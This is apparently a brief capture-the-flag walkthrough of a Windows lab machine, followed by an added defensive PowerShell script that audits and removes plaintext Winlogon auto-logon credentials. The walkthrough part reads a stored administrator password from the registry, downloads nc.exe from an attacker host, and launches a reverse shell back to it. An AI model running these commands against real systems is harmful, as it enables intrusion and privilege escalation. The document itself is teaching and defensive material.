nmap
Exploit
Create a shell with msfvenom as described in the exploit
Get the exploit from searchsploit or exploitdb
Shell
Privilege Escalation
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.16:8000/nc.exe','C:\Users\Alfred\Desktop\nc.exe')
$username = 'administrator'
$password = 'Welcome1!'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process C:\Users\Alfred\Desktop\nc.exe -ArgumentList '-e cmd.exe 10.10.14.16 1234' -Credential $credential
And we get an admin shell
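The privilege escalation above works only because the Winlogon key holds a plaintext DefaultPassword for the administrator account. The following audit script is an added example, not part of the original write-up, showing how a defender would check a host for that misconfiguration and remediate it. It assumes an elevated PowerShell session; the `-Fix` switch and the `Test-WinlogonAutoLogon` function name are this example's own choices, not anything from the page.

```powershell
# Added example (not from the original write-up): audit a Windows host for
# Winlogon auto-logon credentials stored in plaintext under the same registry
# key the write-up queries. Run from an elevated PowerShell session.
function Test-WinlogonAutoLogon {
    param(
        # When set, remove the stored plaintext password and disable auto-logon.
        [switch]$Fix
    )

    $winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $props = Get-ItemProperty -Path $winlogon -ErrorAction Stop

    $autoLogon        = $props.AutoAdminLogon          # '1' enables auto-logon
    $defaultUser      = $props.DefaultUserName
    $defaultDomain    = $props.DefaultDomainName
    $hasPlainPassword = -not [string]::IsNullOrEmpty($props.DefaultPassword)

    # Report the finding without echoing the password itself.
    $finding = [pscustomobject]@{
        AutoAdminLogon        = $autoLogon
        DefaultUserName       = $defaultUser
        DefaultDomainName     = $defaultDomain
        PlaintextPasswordSet  = $hasPlainPassword
        Vulnerable            = ($autoLogon -eq '1' -or $hasPlainPassword)
    }

    if ($finding.Vulnerable) {
        Write-Warning ("Winlogon auto-logon misconfiguration: user '{0}' " +
                       "(plaintext DefaultPassword present: {1})") -f $defaultUser, $hasPlainPassword

        if ($Fix) {
            # Remediation: drop the plaintext secret and turn auto-logon off.
            # If auto-logon is genuinely required (e.g. a kiosk), configure it
            # with Sysinternals Autologon instead, which stores the password as
            # an LSA secret rather than as a readable registry string.
            if ($hasPlainPassword) {
                Remove-ItemProperty -Path $winlogon -Name DefaultPassword
            }
            Set-ItemProperty -Path $winlogon -Name AutoAdminLogon -Value '0'
            Write-Output 'Plaintext DefaultPassword removed and AutoAdminLogon disabled.'
        }
    } else {
        Write-Output 'No plaintext Winlogon auto-logon credentials found.'
    }

    return $finding
}

# Usage: audit only
Test-WinlogonAutoLogon
# Usage: audit and remediate
# Test-WinlogonAutoLogon -Fix
```

The script deliberately never prints the DefaultPassword value; it only reports whether one is set, so the audit output can be shared or centrally collected without spreading the credential. Note that any local user can read this key, which is why a low-privileged shell like the one obtained above is enough to recover the administrator password when it is stored this way.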